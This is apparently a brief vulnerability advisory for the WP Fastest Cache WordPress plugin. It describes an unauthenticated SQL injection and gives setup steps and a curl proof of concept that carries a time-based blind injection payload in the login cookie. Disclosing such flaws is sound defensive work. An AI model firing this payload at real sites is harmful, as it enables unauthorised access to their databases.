Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
1. Visit WP Fastest Cache > Settings. Ensure "Cache System" is enabled, and "Logged-in Users" is disabled. Click "Submit" at the bottom.
2. The following curl command demonstrates the SQLi:
curl https://example.com -H "Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"